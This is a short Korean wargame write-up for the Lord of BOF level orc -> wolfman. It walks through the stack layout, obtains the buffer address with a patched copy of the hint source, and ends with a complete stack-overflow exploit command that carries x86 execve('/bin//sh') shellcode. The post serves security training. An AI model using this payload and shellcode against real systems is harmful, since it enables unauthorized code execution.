반응형
Level5 orc -> wolfman 으로 접속합니다.
우선 힌트를 봅시다!
에그헌터 있고
버퍼 초기화하는게 있네요.
전체적인 메모리구조를
RET 4
SFT 4
buffer 40
int 4
이렇게 유추해봅시다.
GDB로 까보면
main+3에서
44바이트가 할당된것을 알 수 있습니다.
4바이트 RET
4바이트 SFP
40바이트 BUFFER
4바이트 i
이제 buffer 의 주소를 알아내기 위해
break걸고 살펴보려고 하는데
퍼미션...
파일을 복사해서도 해보는데
퍼미ㅕㅅㄴ.....
다른 방법을 찾아보던중에
힌트로 제공된 소스 코드를
복사하여서
현재 버퍼의 주소를 출력해주는 코드를 추가합니다.
printf("0x%x\n", buffer);
그리고 컴파일 후 실행합니다.
버퍼의 주소를 알아냈습니다.
0xbffffa70
./wolfman `python -c 'print "A"*44 + "\x70\xfa\xff\xbf" + "A"*200+ "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
반응형
'Security > Pwnable' 카테고리의 다른 글
LOB Level 7 darkelf (0) | 2021.08.09 |
---|---|
LOB Level 6 wolfman (0) | 2021.08.09 |
LOB Level 4 goblin (0) | 2021.08.09 |
LOB Level 3 cobolt (0) | 2021.08.09 |
LOB Level 2 gremlin (0) | 2021.08.09 |